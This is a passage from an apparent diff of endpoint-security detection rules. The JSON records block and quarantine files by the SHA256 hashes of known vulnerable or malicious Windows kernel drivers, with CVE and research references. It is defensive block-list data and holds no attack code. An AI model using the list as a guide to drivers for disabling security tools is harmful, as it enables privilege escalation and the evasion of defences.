+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4141f367-f7c7-5020-a410-ef19da7cb172",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155380Z",
+ "creation_date": "2026-03-23T11:45:31.155382Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155387Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71b7882a9b91d824c6c84fc30c5c1548fafb4e0d0eab9bfa2b45d087426a261d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "414667a5-0729-5123-8b4f-769fc65396d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613951Z",
+ "creation_date": "2026-03-23T11:45:29.613953Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613959Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85ac17aec836d5125db7407d2dc3af8e5b01241fea781b2fd55aae796b3912b4",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4147429d-3679-5a6c-be91-1312caff0657",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822637Z",
+ "creation_date": "2026-03-23T11:45:30.822639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822644Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06c40abdf980ea22c8c4c50d9599db95d586354a8177e2cd670124e46a22a1f1",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "414ad226-9f53-5ece-b52f-8260ddbede02",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609411Z",
+ "creation_date": "2026-03-23T11:45:29.609413Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609419Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c92d943a465e20f50bae8d46ea38b635d2da85ae4e34f0170fd6f451890c76d7",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "414cd694-d4ff-5db9-8967-bb70dce84134",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976696Z",
+ "creation_date": "2026-03-23T11:45:29.976698Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976704Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d579b1853c528e54464c2607e559591ee01b0ab75bc016c14de1c38068328a81",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4152ad10-3964-505e-8553-37a2ac65bec1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604109Z",
+ "creation_date": "2026-03-23T11:45:29.604111Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604117Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "facc577070cf72cb8d9247e36054fcb30c60a35ae056cffac7411648c513e642",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "415b6f59-ed24-59b7-8e81-32dc2311d321",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827158Z",
+ "creation_date": "2026-03-23T11:45:31.827160Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827165Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7ff86dc7076bdbb447663074f8fe865a6a2df699dec55ffe0a268f086a3b9b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "415df284-d94d-59f2-9e4a-969b80a31fd0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488604Z",
+ "creation_date": "2026-03-23T11:45:31.488606Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488611Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51a63a7cd94daa409f8ef380dd382efe5b0a667092333d06115d2ff370991736",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41727382-77d5-52db-9e3f-8a2497681a31",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492539Z",
+ "creation_date": "2026-03-23T11:45:31.492541Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492546Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b280e3370a7ea9f36a88fe087c4c0cd078274d7910726ff4dfe996786a0ffa9e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "417d8ba5-a58a-527b-8bb3-97c60564f7c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607706Z",
+ "creation_date": "2026-03-23T11:45:29.607708Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607713Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8399e5afd8e3e97139dffb1a9fb00db2186321b427f164403282217cab067c38",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "417e97dd-2309-5a74-a10f-3ddd39819a3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983630Z",
+ "creation_date": "2026-03-23T11:45:29.983632Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8920dedd3c5488ecc1db2ace55b2000d4cebf899c5e591b429d3f7767eee2216",
+ "comment": "Vulnerable Kernel Driver (aka HOSTNT.sys) [https://www.loldrivers.io/drivers/e42cd285-4dda-4086-a696-93ab1d6f17ca/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4182c104-9471-5957-9e9d-a85182fa88b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468917Z",
+ "creation_date": "2026-03-23T11:45:30.468920Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468929Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ccadd6f8b6705e756544646d99f97030f291fc68377ce06f71e8c55512941c47",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "418aeb05-9824-5d35-a1fc-469cb07f4177",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475647Z",
+ "creation_date": "2026-03-23T11:45:30.475650Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5",
+ "comment": "Vulnerable Kernel Driver (aka directio64.sys) [https://www.loldrivers.io/drivers/a254e684-f6eb-40c4-a50a-7b76feb6cc02/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "418f210f-f7f4-504f-a49a-ad39f94b86cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835573Z",
+ "creation_date": "2026-03-23T11:45:30.835575Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835581Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af69ca9a69ca3f344d67646851347288fd12e7cdda2752c73d30330474eb9eca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "419a3541-0988-5d4f-9f97-5b3eff5934a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817480Z",
+ "creation_date": "2026-03-23T11:45:31.817482Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817487Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bd9897e9015714c68648a43917b55d785ed9cbb56f6f8dab29bedb683a9c8b4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "419c1f2f-8fc1-5f34-970a-1b8bed129bbd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816358Z",
+ "creation_date": "2026-03-23T11:45:30.816361Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816366Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "733789d0a253e8d80cc3240e365b8d4274e510e36007f6e4b5fd13b07b084c3e",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "419e290d-a64e-511b-991f-207c02fd7463",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617954Z",
+ "creation_date": "2026-03-23T11:45:29.617956Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617961Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15c53eb3a0ea44bbd2901a45a6ebeae29bb123f9c1115c38dfb2cdbec0642229",
+ "comment": "Vulnerable Kernel Driver (aka nt6.sys) [https://www.loldrivers.io/drivers/e71f0866-e317-44d4-a456-d6f0c555aa73/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41a13983-1ca5-52fe-a8b7-205ea2607ffb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816377Z",
+ "creation_date": "2026-03-23T11:45:30.816380Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816386Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a01529ce82033d94802a3e0cc6a361d51200588068f5bd4f0a08ea05e061240f",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41a95312-c9dd-5551-b80f-18a1b32ccbaf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609667Z",
+ "creation_date": "2026-03-23T11:45:29.609669Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609674Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28999af32b55ddb7dcfc26376a244aa2fe297233ce7abe4919a1aef2f7e2cee7",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41aa1e0e-a7f7-54ba-b3e1-f48ccbfa4e72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614127Z",
+ "creation_date": "2026-03-23T11:45:29.614129Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614135Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41aad461-f9a2-5115-a520-dd3e5d7fdc5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833147Z",
+ "creation_date": "2026-03-23T11:45:30.833150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "99fc46919b6105ecf2d4dae5aca785ac652828e42faede1468be593e52c3acaf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41b7d4bc-0327-5f72-83d5-2493afdb32f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811240Z",
+ "creation_date": "2026-03-23T11:45:31.811242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d74454fbc48c1a5a7dc35f53d58200e49291c34f26ed274bc454abc1ba26002",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "41e36f27-0ab3-56cf-b159-d90b80516f1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
